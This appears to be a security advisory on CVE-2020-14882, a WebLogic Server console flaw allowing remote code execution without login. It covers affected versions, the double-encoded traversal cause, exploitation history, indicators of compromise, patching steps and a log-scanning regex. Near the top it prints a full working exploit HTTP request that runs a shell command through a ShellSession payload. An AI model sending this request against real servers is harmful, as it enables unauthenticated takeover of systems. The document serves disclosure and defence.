CVE-2020-14882 is a critical unauthenticated Remote Code Execution (RCE) vulnerability in Oracle WebLogic Server’s Administration Console. An attacker can exploit it remotely — without any login credentials — using a specially crafted HTTP request to gain full control of the server.
- Vendor: Oracle
- Component: WebLogic Server Console
- CVSS v3.1 Score: 9.8 (Critical)
- Disclosure Date: October 2020
- Attack Vector: Network (HTTP request)
- Authentication Required: None
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: <Target IP>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 128
_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('ipconfig');");
The following WebLogic Server versions are known to be vulnerable:
- 10.3.6.0.0
- 12.1.3.0.0
- 12.2.1.3.0
- 12.2.1.4.0
- 14.1.1.0.0
(Other patch levels or customized builds may also be at risk if not updated.)
The flaw lies in the WebLogic Administration Console’s improper input validation. By sending a specially crafted URL with double URL encoding, an attacker can bypass authentication and access internal server functions.
Typical exploit path example:
/console/css/%252e%252e%252fconsole.portal
Here %252e%252e%252f represents a double-encoded directory traversal sequence, allowing the attacker to escape the normal path and reach sensitive console code.
Once accessed, this can trigger remote command execution or webshell upload.
- Full remote code execution with the privileges of the WebLogic process.
- No authentication required.
- Complete system compromise possible — attackers can deploy malware, steal data, or pivot deeper into the network.
Common exploitation results:
- Deployment of JSP-based webshells
- Cryptomining or ransomware installation
- Persistence mechanisms added to compromised systems
- October 2020: Oracle releases a Critical Patch Update addressing CVE-2020-14882.
- Within days: Public proof-of-concept (PoC) exploits appear online.
- Following weeks: Massive wave of exploitation observed — attackers scanning and exploiting exposed WebLogic servers globally.
- Subsequent months: Used in several major attack campaigns (cryptominers, ransomware, espionage).
1. Access Logs Look for suspicious HTTP requests containing encoded traversal sequences such as:
%252e%252e%252fconsole
or
/console/css/.../console.portal
2. File System Changes
- Unrecognized
.jspfiles appearing under application directories. - New or altered
.wardeployments.
3. Process Activity
- The WebLogic
javaprocess spawning shell commands (/bin/sh,cmd.exe). - Unexpected outbound network connections from the WebLogic host.
4. Persistence Artifacts
- Suspicious scheduled tasks or startup scripts.
- Communication with mining pools or command-and-control servers.
Immediate Actions:
- Patch Immediately — Apply Oracle’s October 2020 Critical Patch Update or later cumulative patches.
- Restrict Access — Limit WebLogic Console access to trusted IPs or management networks only.
- Block Exploits — Use a WAF or proxy rule to block requests containing encoded traversal patterns such as
%252e%252e%252f. - Disable Console if not required in production.
If Compromise Is Suspected:
- Isolate the affected system from the network.
- Search logs and file systems for IOCs mentioned above.
- Rebuild the system from a known-good image.
- Rotate credentials and check for lateral movement.
Regular expression for scanning logs:
%25(2e|2E){2}%25(2f|2F)
This captures double-encoded “../” traversal attempts often used in CVE-2020-14882 exploits.
- Patch Management: Keep WebLogic up to date and test patches before deployment.
- Segmentation: Keep administrative consoles off public networks.
- Monitoring: Enable detailed logging and feed data to your SIEM.
- Incident Response Plan: Prepare automated alerts for abnormal console access patterns.
CVE-2020-14882 remains a textbook example of a critical enterprise RCE — easy to exploit, devastating in impact, and widely weaponized. It underscores the need for prompt patching, network isolation of management interfaces, and continuous monitoring for exploitation attempts.